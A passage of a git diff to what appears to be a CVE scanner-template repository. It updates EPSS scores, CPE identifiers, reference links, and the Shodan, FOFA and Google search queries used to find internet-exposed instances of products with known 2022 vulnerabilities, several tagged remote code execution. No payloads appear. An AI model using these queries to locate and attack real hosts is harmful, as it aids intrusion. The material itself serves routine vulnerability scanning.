info: cve-id: CVE-2022-39195 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58386 + epss-percentile: 0.59024 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: lsoft product: listserv shodan-query: http.html:"LISTSERV" + fofa-query: body="listserv" tags: cve,cve2022,xss,listserv,packetstorm,lsoft http: diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index a0550b3a6f..05ca9d4cce 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.49036 - epss-percentile: 0.97431 + epss-score: 0.35251 + epss-percentile: 0.97125 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: mobile shodan-query: http.favicon.hash:-1274798165 fofa-query: title="Sophos Mobile" + google-query: intitle:"sophos mobile" tags: cve,cve2022,xxe,ssrf,sophos http: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index a6d0caaa93..49ca77dcfc 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.20211 - epss-percentile: 0.96236 + epss-score: 0.23569 + epss-percentile: 0.96565 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +29,6 @@ info: product: booking_calendar framework: wordpress tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart - variables: string: "CVE-2022-3982" diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index bbf0783c46..31b4fed0e4 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -29,6 +29,8 @@ info: vendor: fortinet product: fortinac shodan-query: title:"FortiNAC" + fofa-query: title="fortinac" + google-query: intitle:"fortinac" tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 74311099bb..d1bfdc403d 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-39960 cwe-id: CWE-862 - epss-score: 0.21326 - epss-percentile: 0.96012 + epss-score: 0.19471 + epss-percentile: 0.9629 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 977beb7f8d..c284284b0f 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -30,6 +30,7 @@ info: vendor: raspap product: raspap shodan-query: http.favicon.hash:-1465760059 + fofa-query: icon_hash=-1465760059 tags: cve,cve2022,packetstorm,raspap,rce http: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 4d2e1d1f67..fe13730e16 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.82869 - epss-percentile: 0.98341 - cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* + epss-score: 0.77077 + epss-percentile: 0.98209 + cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: microchip - product: syncserver_s650_firmware + product: syncserver_s650 shodan-query: html:"Symmetricom SyncServer" tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 85d799f96c..6876fc8541 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40032 cwe-id: CWE-89 - epss-score: 0.00174 - epss-percentile: 0.54566 + epss-score: 0.00392 + epss-percentile: 0.73276 cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index d4dae819da..33e6312cce 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -24,6 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.html:"flatpress" + fofa-query: body="flatpress" tags: cve,cve2022,flatpress,authenticated,xss,intrusive variables: randstring: "{{to_lower(rand_base(16))}}" diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 160bffd6a4..21577707d9 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 - epss-score: 0.0212 - epss-percentile: 0.88046 + epss-score: 0.02362 + epss-percentile: 0.89807 cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 2ab8306634..3217751e6f 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-40127 cwe-id: CWE-94 - epss-score: 0.28782 - epss-percentile: 0.96752 + epss-score: 0.46431 + epss-percentile: 0.97434 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: apache product: airflow shodan-query: title:"Sign In - Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve,cve2022,airflow,rce,oast,authenticated,apache http: diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 224eae8487..7303890d0d 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -26,6 +26,8 @@ info: product: wp_user framework: wordpress publicwww-query: /wp-content/plugins/wp-user/ + shodan-query: http.html:/wp-content/plugins/wp-user/ + fofa-query: body=/wp-content/plugins/wp-user/ tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 38f1381f3f..7917c1968a 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-4050 cwe-id: CWE-89 epss-score: 0.04713 - epss-percentile: 0.9246 + epss-percentile: 0.92631 cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 9cc0272f1e..d295726da5 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -29,6 +29,8 @@ info: product: autooptimize framework: wordpress publicwww-query: /wp-content/plugins/autoptimize + shodan-query: http.html:/wp-content/plugins/autoptimize + fofa-query: body=/wp-content/plugins/autoptimize tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 4047f7f53e..cdb0f5b452 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -10,13 +10,14 @@ info: reference: - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d - https://nvd.nist.gov/vuln/detail/CVE-2022-4059 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4059 cwe-id: CWE-89 - epss-score: 0.01515 - epss-percentile: 0.85653 + epss-score: 0.02077 + epss-percentile: 0.89035 cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +26,8 @@ info: product: cryptocurrency_widgets_pack framework: wordpress publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ + shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ + fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 892680e979..8164ade2d3 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.04425 - epss-percentile: 0.92213 + epss-score: 0.08321 + epss-percentile: 0.9437 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 12eece546a..7f438f0a4f 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966 - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 - epss-score: 0.01632 - epss-percentile: 0.86143 + epss-score: 0.10627 + epss-percentile: 0.95035 cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,7 @@ info: vendor: unisharp product: laravel_filemanager shodan-query: http.html:"Laravel Filemanager" + fofa-query: body="laravel filemanager" tags: cve,cve2022,laravel,unisharp,lfi,traversal http: diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 5cff18afee..da58a2fe39 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -18,13 +18,13 @@ info: cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 - epss-score: 0.40937 - epss-percentile: 0.97197 - cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* + epss-score: 0.37501 + epss-percentile: 0.97193 + cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tenda - product: w15e_firmware + product: ac1200_v-w15ev2 tags: cve2022,cve,tenda,auth-bypass,router,iot http: diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 0132443048..432e1b7944 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40879 cwe-id: CWE-79 - epss-score: 0.03708 - epss-percentile: 0.91567 + epss-score: 0.01698 + epss-percentile: 0.8773 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 929886f5a0..db182f973a 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -14,19 +14,21 @@ info: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://github.com/advisories/GHSA-wx3r-88rg-whxq - https://nvd.nist.gov/vuln/detail/CVE-2022-40881 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 - epss-score: 0.96169 - epss-percentile: 0.99389 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* + epss-score: 0.95977 + epss-percentile: 0.99469 + cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec - product: solarview_compact_firmware + product: solarview_compact shodan-query: http.favicon.hash:"-244067125" tags: cve,cve2022,solarview,rce,lfi,contec variables: diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index c6161c4c1e..47e9ed5811 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-4117 cwe-id: CWE-89 epss-score: 0.03413 - epss-percentile: 0.9123 + epss-percentile: 0.91452 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index 5af2d670a0..4c5cf2039d 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -17,15 +17,15 @@ info: cvss-score: 8.6 cve-id: CVE-2022-41412 cwe-id: CWE-918 - epss-score: 0.0012 - epss-percentile: 0.45431 + epss-score: 0.0224 + epss-percentile: 0.89541 cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 vendor: perfsonar product: perfsonar fofa-query: title="perfSONAR Toolkit" - verified: true tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 9f6631c80e..55a5b61b57 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -30,6 +30,7 @@ info: vendor: reqlogic product: reqlogic shodan-query: http.html:"ReQlogic" + fofa-query: body="reqlogic" tags: cve,cve2022,packetstorm,xss,reqlogic http: diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index bfd1a094ab..b71b44fa26 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -30,7 +30,8 @@ info: vendor: rpcms product: rpcms shodan-query: http.html:"RPCMS" - tags: cve,cve2022,rpcms,xss,rpcms + fofa-query: body="rpcms" + tags: cve,cve2022,rpcms,xss http: - method: GET diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 45ed564efd..5db21049c2 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -29,6 +29,7 @@ info: max-request: 4 vendor: backdropcms product: backdrop + shodan-query: cpe:"cpe:2.3:a:backdropcms:backdrop" tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms http: diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 90bb990148..9f6cb66404 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -13,13 +13,14 @@ info: - https://github.com/bypazs/CVE-2022-42096 - https://nvd.nist.gov/vuln/detail/CVE-2022-42096 - https://backdropcms.org + - https://github.com/manas3c/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 - epss-score: 0.00345 - epss-percentile: 0.68611 + epss-score: 0.0068 + epss-percentile: 0.79938 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index bbcead7f84..b04ac726d0 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -29,6 +29,7 @@ info: product: 11n_firmware shodan-query: http.title:"Tenda 11N" fofa-query: product=="Tenda-11N-Wireless-AP" + google-query: intitle:"tenda 11n" tags: cve,cve2022,tenda,auth-bypass,router,iot http: diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index d16dedd21d..58952063d7 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -30,6 +30,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index bd1e3f515d..9a9c3581ae 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -29,6 +29,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 1dc7d0f8b4..b6b020f53c 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42748 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.42811 + epss-score: 0.00111 + epss-percentile: 0.44292 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 0bac3de00d..757812e06d 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -30,6 +30,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 834b58e037..2928cc45f8 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -13,13 +13,14 @@ info: reference: - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4295 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40181 + epss-score: 0.0012 + epss-percentile: 0.46205 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +29,8 @@ info: product: show_all_comments framework: wordpress publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page + fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index e9be075582..85067c7dfd 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43014 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39871 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 46e174e250..a7e4f8bb52 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43015 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39871 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 6fa025fbf6..92b353c8fa 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -30,6 +30,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index e30ecdfee1..b54cfe9af1 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -27,6 +27,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index 5b1583f4d7..a17b4eb1c0 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -11,13 +11,16 @@ info: reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43018 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40565 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +28,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index d8b5febff5..7a380b5adf 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4305 cwe-id: CWE-269 - epss-score: 0.04963 - epss-percentile: 0.92644 + epss-score: 0.06738 + epss-percentile: 0.9384 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: login_as_user_or_customer_\(user_switching\) framework: wordpress publicwww-query: /wp-content/plugins/login-as-customer-or-user + shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user + fofa-query: body=/wp-content/plugins/login-as-customer-or-user tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy http: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 0ee7cc148d..cd761c6f9f 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 2d5f2093c6..00c47dfce3 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 13fd099436..c80e682bb4 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 87d4b73096..1298ccca67 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index afbf5927fe..6380bf2f13 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -19,14 +19,16 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43169 cwe-id: CWE-79 - epss-score: 0.003 - epss-percentile: 0.66367 + epss-score: 0.00363 + epss-percentile: 0.72306 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 9944fac2f6..e6e9cba7f6 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -19,14 +19,16 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43170 cwe-id: CWE-79 - epss-score: 0.26563 - epss-percentile: 0.96323 + epss-score: 0.30215 + epss-percentile: 0.9694 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index ca6731f209..c9fc1fb9ef 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -25,6 +25,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 4ee1172954..076660f1da 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -30,6 +30,8 @@ info: product: pdf_generator_for_wordpress framework: wordpress publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" + shodan-query: http.html:/wp-content/plugins/pdf-generator-for-wp + fofa-query: body=/wp-content/plugins/pdf-generator-for-wp tags: 